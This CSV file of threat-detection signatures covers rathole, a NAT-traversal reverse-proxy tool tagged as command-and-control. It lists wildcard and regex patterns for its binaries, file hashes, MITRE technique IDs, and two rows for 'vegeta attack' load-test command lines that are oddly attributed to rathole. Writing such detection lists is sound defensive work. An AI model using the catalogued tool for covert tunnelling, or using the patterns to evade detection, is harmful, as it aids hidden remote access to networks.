"*\rathole-mips-*",".{0,1000}\\rathole\-mips\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole-x86_64*",".{0,1000}\\rathole\-x86_64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*| vegeta attack -duration 10s > /dev/null*",".{0,1000}\|\svegeta\sattack\s\-duration\s10s\s\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*| vegeta attack -rate *",".{0,1000}\|\svegeta\sattack\s\-rate\s.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0059214c35241df34371e16ec368ef02023ca321cbdc8608c36ab75c4b14cab4*",".{0,1000}0059214c35241df34371e16ec368ef02023ca321cbdc8608c36ab75c4b14cab4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*016d82ec6cf3550ac4dea3881c248a0d544f09144881557439aa6e4b0f134989*",".{0,1000}016d82ec6cf3550ac4dea3881c248a0d544f09144881557439aa6e4b0f134989.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*024db78c74b32524c54cc8617d1c7dbcd742b0d99bf44087ad85c2e913ca4156*",".{0,1000}024db78c74b32524c54cc8617d1c7dbcd742b0d99bf44087ad85c2e913ca4156.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0581143b11d99500ea1fd4b61775c395276fd3ec2a0352cf3b9050274ddd8068*",".{0,1000}0581143b11d99500ea1fd4b61775c395276fd3ec2a0352cf3b9050274ddd8068.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*05da4e917b0c66df49df25e8e1139d57a8bfd6454ecd3e69ebb433fe0a52988c*",".{0,1000}05da4e917b0c66df49df25e8e1139d57a8bfd6454ecd3e69ebb433fe0a52988c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*065886fd1e058334a56aae3730a9291f35cc144a858a0435d17773f85b3fb5c9*",".{0,1000}065886fd1e058334a56aae3730a9291f35cc144a858a0435d17773f85b3fb5c9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*075860a08ea0a48a076989f101341a2b20f62e493fc045e9b3f2c6b04fee7374*",".{0,1000}075860a08ea0a48a076989f101341a2b20f62e493fc045e9b3f2c6b04fee7374.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*082b4796f2b2fb7a81f9f00a8b2008713fba88eb8d80266c12a24a8ed3379101*",".{0,1000}082b4796f2b2fb7a81f9f00a8b2008713fba88eb8d80266c12a24a8ed3379101.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0aef9a7896fe8bcad991aec5afc995529bd676169494759b4c5b0d4867431da0*",".{0,1000}0aef9a7896fe8bcad991aec5afc995529bd676169494759b4c5b0d4867431da0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0e7eb9d663478b8e6567d14c86a08b41e179a6ff7af69f44d343a05aa5082c23*",".{0,1000}0e7eb9d663478b8e6567d14c86a08b41e179a6ff7af69f44d343a05aa5082c23.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0efb7bcf56f438180692206231d7119baf1696a927a64097ff0e4fdeb2d7b68a*",".{0,1000}0efb7bcf56f438180692206231d7119baf1696a927a64097ff0e4fdeb2d7b68a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*0f37caadfbf7eb1c8d7462487deec3080ca824c06ab1cef3a17ee803f80e0b96*",".{0,1000}0f37caadfbf7eb1c8d7462487deec3080ca824c06ab1cef3a17ee803f80e0b96.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*10667fa9b2ff274ad3ad30e8747278bf55a1ff2b47db7fe43216e5f77c15ed3d*",".{0,1000}10667fa9b2ff274ad3ad30e8747278bf55a1ff2b47db7fe43216e5f77c15ed3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*113d243a2931e1b1b610181229a9e52d3ebd47fde7b5c2f286b8d54aed09efba*",".{0,1000}113d243a2931e1b1b610181229a9e52d3ebd47fde7b5c2f286b8d54aed09efba.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*113f78974c687c8bc7ba3ae62843a9fdb1d767c85fbbda7779e7199b5a560100*",".{0,1000}113f78974c687c8bc7ba3ae62843a9fdb1d767c85fbbda7779e7199b5a560100.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*137fc29ed639a8b44b3056598d1c85505650b5ad3a4a4e392b084ee7345e58b7*",".{0,1000}137fc29ed639a8b44b3056598d1c85505650b5ad3a4a4e392b084ee7345e58b7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*14e7065f629b384425308287023f0bd181c464ea522109846c2d7db26ad29608*",".{0,1000}14e7065f629b384425308287023f0bd181c464ea522109846c2d7db26ad29608.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*14ebe6f781314c1d68eecca437483e92b621ca69f8859a652d73a94dd0a93018*",".{0,1000}14ebe6f781314c1d68eecca437483e92b621ca69f8859a652d73a94dd0a93018.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*15b24f9b6d402b8f55a96f9deea8cc387513c040030428d9c32dbfb1013d912f*",".{0,1000}15b24f9b6d402b8f55a96f9deea8cc387513c040030428d9c32dbfb1013d912f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*167a5fd6a1435ef23452aabcc251924144c04fb75cba9d178d3b4eec0a0b89d6*",".{0,1000}167a5fd6a1435ef23452aabcc251924144c04fb75cba9d178d3b4eec0a0b89d6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*189b30810273723068cc1de34f0898f999fb1e8e912140e78119f588de4c613b*",".{0,1000}189b30810273723068cc1de34f0898f999fb1e8e912140e78119f588de4c613b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*191768fc581508bcc3426c4ed5d227ff4b075d6d1d5309d220d144486d8490d1*",".{0,1000}191768fc581508bcc3426c4ed5d227ff4b075d6d1d5309d220d144486d8490d1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*193051af6c427627482ae2318feff8615ce834f3c00cb61d7a12e71bfabc60f3*",".{0,1000}193051af6c427627482ae2318feff8615ce834f3c00cb61d7a12e71bfabc60f3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*197893f2048f9925f1e6ed4e292ac9e7fc5923fa06cb27f994d26572e8015263*",".{0,1000}197893f2048f9925f1e6ed4e292ac9e7fc5923fa06cb27f994d26572e8015263.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1a451fd4ea04c5e764361e14cf2458ed4c3880659d0aa664c9dbc5ab74d7b44e*",".{0,1000}1a451fd4ea04c5e764361e14cf2458ed4c3880659d0aa664c9dbc5ab74d7b44e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1a7124d26b8e5b879fd245cd8c0d0eae962a3aa7e897d7cecf23c38528a3f58c*",".{0,1000}1a7124d26b8e5b879fd245cd8c0d0eae962a3aa7e897d7cecf23c38528a3f58c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1b501cd229b855a0d7c4fe904c512ea453a3c1b225f55f03a4577e91cc434aaf*",".{0,1000}1b501cd229b855a0d7c4fe904c512ea453a3c1b225f55f03a4577e91cc434aaf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1c4cd487862b68af1e3319e7f37e3b37db822b41e580528653c16264e5d44c40*",".{0,1000}1c4cd487862b68af1e3319e7f37e3b37db822b41e580528653c16264e5d44c40.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1c722fc7d3e234e27029f791232f8f19460b02226f80d391ab8f2102b5f76c29*",".{0,1000}1c722fc7d3e234e27029f791232f8f19460b02226f80d391ab8f2102b5f76c29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1d55ef3e801a86435e2146f3409669fd31cb572500f3da333109f017181114c5*",".{0,1000}1d55ef3e801a86435e2146f3409669fd31cb572500f3da333109f017181114c5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1df13a2ce963c124cb494c745e67d8bf8abb87b94a9b640e5143b16138cb5d2d*",".{0,1000}1df13a2ce963c124cb494c745e67d8bf8abb87b94a9b640e5143b16138cb5d2d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*1e8312b30e0290161f6304f3fe76b7bf1cd111038b09e423f3d30ce1e77a7bdc*",".{0,1000}1e8312b30e0290161f6304f3fe76b7bf1cd111038b09e423f3d30ce1e77a7bdc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*21fc8fb357996e9e95c04088f5fdc06cf2862bb7cb074e0f2919e9ed015ee884*",".{0,1000}21fc8fb357996e9e95c04088f5fdc06cf2862bb7cb074e0f2919e9ed015ee884.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*22eb2e3f446e71d111afbe7e10ec82d0c729545e7823d9ca860f3a65754cc200*",".{0,1000}22eb2e3f446e71d111afbe7e10ec82d0c729545e7823d9ca860f3a65754cc200.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*24f8d15c5c09600a2138153f68eebed5831b31d90ae785bf4d25c6129afe2be5*",".{0,1000}24f8d15c5c09600a2138153f68eebed5831b31d90ae785bf4d25c6129afe2be5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*261dc25293f04e40a09a24fd1e039041aea5e27afa7ddb234db3882b74b396ca*",".{0,1000}261dc25293f04e40a09a24fd1e039041aea5e27afa7ddb234db3882b74b396ca.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*262a3f517a064466994ff41b9fa24f03b5df660adf9a4ff53ad34fd071bd85a9*",".{0,1000}262a3f517a064466994ff41b9fa24f03b5df660adf9a4ff53ad34fd071bd85a9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*26600cf2666c1482269a4844910e9af915894981dedd319dfa47e7f3240dba7e*",".{0,1000}26600cf2666c1482269a4844910e9af915894981dedd319dfa47e7f3240dba7e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*272c46ee6c8dc5d08397a2d602e398ca5465bce04df1571fc53ee993ea58d95f*",".{0,1000}272c46ee6c8dc5d08397a2d602e398ca5465bce04df1571fc53ee993ea58d95f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2874343d4ca8de15f5a994dbf330d7497cc6798e5685db1d3c4a64ed160dffd2*",".{0,1000}2874343d4ca8de15f5a994dbf330d7497cc6798e5685db1d3c4a64ed160dffd2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*28b4073db264ae8edbbc66194419ba03950a22c63c88555978a6d4747245c9e8*",".{0,1000}28b4073db264ae8edbbc66194419ba03950a22c63c88555978a6d4747245c9e8.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2a7a2455eaa1b1bf0ae58b1edd93acc514b4f985ec57c681e85d7490e50402f9*",".{0,1000}2a7a2455eaa1b1bf0ae58b1edd93acc514b4f985ec57c681e85d7490e50402f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2abf5f64cce68069617766e7d6c105b71215fc936574e31c13a8aa116c14ac4e*",".{0,1000}2abf5f64cce68069617766e7d6c105b71215fc936574e31c13a8aa116c14ac4e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2b33ead1b58d9e5254447cef54119027e5b1ca360c88e5929bff19685955d668*",".{0,1000}2b33ead1b58d9e5254447cef54119027e5b1ca360c88e5929bff19685955d668.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2b3f74062d1303d71cd368b1090436d1aeddecf45e8561bd94f9fe412dd1abff*",".{0,1000}2b3f74062d1303d71cd368b1090436d1aeddecf45e8561bd94f9fe412dd1abff.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2b4df7d7756102aadcdeda533e9372a45ede141300ef3d7941dd0d445de8adb6*",".{0,1000}2b4df7d7756102aadcdeda533e9372a45ede141300ef3d7941dd0d445de8adb6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2da2aa0a3d231a0b7aee9d0bbd71e6c20a836def31a42711875acc0eeee75635*",".{0,1000}2da2aa0a3d231a0b7aee9d0bbd71e6c20a836def31a42711875acc0eeee75635.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2e90b0aeb75f7fc93b683697981df8cbcc207690fc550f0d36d80d2281ce4d14*",".{0,1000}2e90b0aeb75f7fc93b683697981df8cbcc207690fc550f0d36d80d2281ce4d14.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2f3b4900a63d32a14e1578b2de68f78daad89b7c47b9388c26d922962faef430*",".{0,1000}2f3b4900a63d32a14e1578b2de68f78daad89b7c47b9388c26d922962faef430.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*2f747edb8eed5af60f18975abb44746e3986e332b6099764f91b6e2882736150*",".{0,1000}2f747edb8eed5af60f18975abb44746e3986e332b6099764f91b6e2882736150.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*30338174d43234b97ffa081de00dc8364df7e1bc50e69ebba7c915c61adfacf1*",".{0,1000}30338174d43234b97ffa081de00dc8364df7e1bc50e69ebba7c915c61adfacf1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*308128ad3679e15f7992bcb3305e5a286a8a865df3ee7e6b3e4a07b5a041a46a*",".{0,1000}308128ad3679e15f7992bcb3305e5a286a8a865df3ee7e6b3e4a07b5a041a46a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*335ce7cb470142a3022d1158a8f102bcd97a8a0348d47022c4674d70a1487e6e*",".{0,1000}335ce7cb470142a3022d1158a8f102bcd97a8a0348d47022c4674d70a1487e6e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*336cc961fe07dfb37fc61a5b585ae5b9e966389062aa2cc0d70d282e56edf32f*",".{0,1000}336cc961fe07dfb37fc61a5b585ae5b9e966389062aa2cc0d70d282e56edf32f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*348064a4a5a249c2e4a76251dea47477f366babc23bb26633923c75302d844f2*",".{0,1000}348064a4a5a249c2e4a76251dea47477f366babc23bb26633923c75302d844f2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*357374d483045884038aa500fdba371af79e095d8e900f2d49bc23c45348ac07*",".{0,1000}357374d483045884038aa500fdba371af79e095d8e900f2d49bc23c45348ac07.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*37bc6496577a618cfba0ea53759dabf7e01e218ede999d5290d32040cd219eba*",".{0,1000}37bc6496577a618cfba0ea53759dabf7e01e218ede999d5290d32040cd219eba.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
